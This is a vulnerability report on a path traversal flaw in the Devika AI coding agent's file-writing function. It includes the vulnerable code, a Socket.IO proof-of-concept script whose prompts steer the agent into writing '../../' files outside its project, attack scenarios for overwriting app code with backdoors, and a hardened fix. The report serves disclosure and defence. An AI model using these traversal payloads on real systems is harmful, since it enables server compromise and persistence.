[Bug] Coder Agent path traversal vulnerability #707

@Ro1ME

Describe the bug

CRITICAL SECURITY VULNERABILITY: The Coder Agent's save_code_to_project function contains a path traversal vulnerability that allows attackers to write files outside the intended project workspace, potentially compromising the entire server.

Vulnerability Type: CWE-22 Path Traversal
CVSS Score: 8.8 (High)
Affected File: src/agents/coder/coder.py:73
Affected Function: Coder.save_code_to_project
Entry Point: Socket.IO user-message event

Root Cause: The function constructs file paths using user-controlled input without proper boundary validation:

    # Line 73 - VULNERABLE CODE
    file_path = os.path.join(project_path, file_name)  # No path validation
    with open(file_path, 'w') as f:
        f.write(code)

Security Impact:

  • Arbitrary File Write: Write files anywhere on the server filesystem
  • Code Execution: Overwrite Python modules or system files
  • Data Exfiltration: Write sensitive data to web-accessible directories
  • Persistence: Plant backdoors in startup scripts

How To Reproduce

Prerequisites

  1. Start Devika server:

    cd devika
    python3 -m venv venv
    source venv/bin/activate  # On Windows: venv\Scripts\activate
    pip install -r requirements.txt
    python app.py

  2. Access web UI at http://localhost:1337

  3. Create a new project via the UI

Steps to reproduce the behavior

  1. Connect to Socket.IO endpoint:

    import socketio
    
    sio = socketio.Client()
    sio.connect('http://localhost:1337')

  2. Send malicious user message to trigger Coder agent:

    # First, create a baseline file in the project
    sio.emit('user-message', {
        'message': 'Create a file called bootstrap.py with print("hello")',
        'project_name': 'test-project'
    })
    
    # Wait for agent to complete...

  3. Send path traversal payload:

    # Trigger path traversal via Coder agent
    sio.emit('user-message', {
        'message': 'Create a file at ../../devika_coder_escape.txt with content "PWNED"',
        'project_name': 'test-project'
    })

  4. Verify file was written outside project workspace:

    # File should exist at: data/devika_coder_escape.txt
    # (escaped from data/projects/test-project/)
    cat data/devika_coder_escape.txt
    # Output: PWNED

Expected behavior

  • File paths should be validated and normalized before writing
  • Paths containing .. should be rejected or sanitized
  • All file operations should be confined to the project workspace
  • Absolute paths should be rejected

Screenshots and logs

Backend Logs:

[2026-04-10 04:13:56] Agent state: completed
[2026-04-10 04:13:56] Terminal: vim bootstrap.py
[2026-04-10 04:13:56] Output: print('bootstrap')

[2026-04-10 04:13:59] Agent state: completed
[2026-04-10 04:13:59] Terminal: vim ../../devika_coder_escape.txt
[2026-04-10 04:13:59] Output: DEVIKA_CODER_LIVE_POC
[2026-04-10 04:13:59] WARNING: File written outside project workspace!

Validation Evidence:

{
  "project_root": "data/projects/test-project",
  "escape_target": "data/devika_coder_escape.txt",
  "escape_target_exists": true,
  "escape_target_within_project_root": false,
  "escape_target_content": "DEVIKA_CODER_LIVE_POC"
}

File System Evidence:

data/
├── projects/
│   └── test-project/
│       └── bootstrap.py          ✓ Expected location
└── devika_coder_escape.txt       ❌ ESCAPED PROJECT WORKSPACE

Configuration

- OS:  Windows
- Python version: 3.10+
- Node version:  18.0.0
- bun version: 0.1.0
- search engine:  google
- Model: gpt-4

Additional context

Validation Status: ✅ CONFIRMED with real Socket.IO entry point

Attack Scenarios:

  1. Overwrite application code:

    Message: "Create file at ../../app.py with malicious code"
    Result: Main application file overwritten with backdoor
    
  2. Exfiltrate data to web directory:

    Message: "Create file at ../../../static/leaked_data.json"
    Result: Sensitive data accessible via HTTP
    
  3. Modify configuration:

    Message: "Create file at ../../config.toml with malicious settings"
    Result: Application configuration compromised
    

Related Vulnerabilities: This repository contains 2 additional identical vulnerabilities in Feature and Patcher agents (reported separately).
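
The containment check that the "Expected behavior" list asks for, as an added example that is not part of the original report or Devika's code. The names `PathEscapeError`, `resolve_in_project` and `save_code_to_project_safe` are hypothetical, the `(project_path, file_name, code)` parameters are assumed from the snippet quoted in the report, and the file names in `demo()` are constructed.

```python
import os
import tempfile

class PathEscapeError(ValueError):
    """A requested file name resolves outside the project workspace."""

def resolve_in_project(project_path, file_name):
    """Return the real path for file_name, or raise if it leaves project_path."""
    if not file_name or "\x00" in file_name:
        raise PathEscapeError("empty or malformed file name")
    # os.path.join discards project_path when file_name is absolute or
    # drive-qualified, so reject those before joining.
    if os.path.isabs(file_name) or os.path.splitdrive(file_name)[0]:
        raise PathEscapeError(f"absolute path rejected: {file_name!r}")
    root = os.path.realpath(project_path)
    # realpath collapses ".." and follows symlinks, so the comparison is made
    # on the location the write would actually land in.
    candidate = os.path.realpath(os.path.join(root, file_name))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise PathEscapeError(f"path escapes project root: {file_name!r}")
    return candidate

def save_code_to_project_safe(project_path, file_name, code):
    """Hypothetical hardened counterpart of the write shown in the report."""
    file_path = resolve_in_project(project_path, file_name)
    os.makedirs(os.path.dirname(file_path), exist_ok=True)
    with open(file_path, "w", encoding="utf-8") as f:
        f.write(code)
    return file_path

def demo():
    """Run constructed file names against a throwaway data/projects layout."""
    names = ["bootstrap.py", "pkg/util.py", "../../devika_coder_escape.txt",
             "a/../../b.txt", os.path.abspath(os.sep + "tmp_abs.txt")]
    with tempfile.TemporaryDirectory() as data:
        project = os.path.join(data, "projects", "test-project")
        os.makedirs(project)
        results = []
        for name in names:
            try:
                save_code_to_project_safe(project, name, "print('hello')\n")
                results.append("written")
            except PathEscapeError:
                results.append("rejected")
        escaped = os.path.exists(os.path.join(data, "devika_coder_escape.txt"))
    return results, escaped
```

The check and the `open` call are separate steps, so this assumes no other process can create symlinks inside the project directory between them.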
